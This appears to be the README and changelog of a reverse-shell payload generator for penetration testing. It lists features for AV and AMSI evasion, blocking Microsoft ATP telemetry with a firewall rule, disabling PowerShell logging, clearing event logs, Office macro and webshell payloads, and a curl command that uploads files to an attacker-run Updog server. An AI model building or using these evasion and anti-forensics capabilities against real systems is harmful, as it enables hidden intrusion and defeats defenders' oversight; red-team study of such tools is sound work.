A script for generating common revshells fast and easy.
Especially nice when in need of PowerShell and Python revshells, which can be a PITA getting correctly formated.

• Shows username@computer, above the prompt and working-directory
• Has a partial AMSI-bypass making some stuff a bit easier, like loading a full AMSI bypass.
• TCP and UDP shells
• Windows Powershell and Core Powershell
• Functions for uploading and downloading files. (Using Updog by sc0tfree)

• ngrok can be started/stopped from inside the script
• payloads will be genereated with the ngrok addresses

• you can start/stop Updog from inside the script
• The PowerShell revshells have upload/download function embedded
• To upload from nix using curl: curl -F path="absolute path for Updog-folder" -F file=filename http://UpdogIP/upload

git clone https://github.com/4ndr34z/shells
cd shells
./install.sh

Link

• PowerShell: Changed revshell for bypassing more AV vendors
• Powershell: Added firewall-rule, preventing MS ATP from phoning home (if the running user has access)
• Powershell: Updated VBA (MS Office Macros)

• PowerShell: Disabling scriptblock logging and CheckSuspiciousContent
• PowerShell: Clears PowerShell eventlogs (if the running user has access)

• PowerShell: Added VBA payloads for MS Office Macros
• Added some node.js payloads

• Added a simple C# shell.
• Added payload for reflective loading the C# shell into memory. (Needs full AMSI bypass)
• Covering this by adding Rastamouse's full AMSI Bypass
• PowerShell: You can automatically upload and run full AMSI bypass. The partitial AMSI bypass makes this possible.
• C# Shell: Automatically upload and run full AMSI bypass before loading it into memory
• Updog and ngrok status showing in every menu

• Sometimes less is more. Removed the obfuscating on TCP/UDP PowerShell revshells, because it actually triggers AV more than it bypasses and the payload got really big :-) Still using randomization.

• Added webshells (ASPX, PHP, JSP)

• Added 2 c++ revshell binaries for Windows 32 and 64 bit.

• Fixed the handling of starting/stopping Updog

• Added Updog support
• Added Netcat binaries.
• Powershell: Created upload/download functionality (upload requires Updog for receiving files)
• Added more information about running ngrok and Updog.

• PowerShell: Added a new "mini AMSI-bypass". (It is a partial bypass) Based on Matt Graebers Reflection method
• PowerShell: Added a "upload" function in the Powershell reverseshell

• Removed AMSI. Not tested enough :-)

• Added AMSI-bypass for the powershell payloads

• Fixed bug when setting port
• Changed default port to 443
• PowerShell: obfuscated some more

• PowerShell: Minor changes to the UDP payload

• Using only native nc on macOS, because the one on homebrew doesn't work on incoming UDP
• PowerShell: Added UDP payloads

• PowerShell: Added more payloads

• PowerShell: Added some randomization and obfuscation for the payload

• PowerShell: Using UTF8 encoding in payload

• Added Golang

• Added OpenSSL

• Fixed bug in Python revshell
• Added awk
• Added Bash UDP

• Added Windows Python revshells

• Added a ngrok running-status

• Hiding ngrok choice if not installed

• Fixed the install options: not doing default option when pressing enter without making a choice

• Added support for ngrok.

• Added a install-script
• Added install options for checking and installing missing dependencies

• Added a couple of PHP shells

• Added shells for: Ruby, Perl, Telnet and zsh

• Added copy to clipboard using pbcopy on macOS
• Added info about listening netcat as the macOS versions doesn't display that

• Added looping netcat shells. Calls back every 10 seconds. Great in case you loose your shell
• Added check for netcat GNU netcat 0.7.0 Homebrew when running on macOS

• Added support for macOS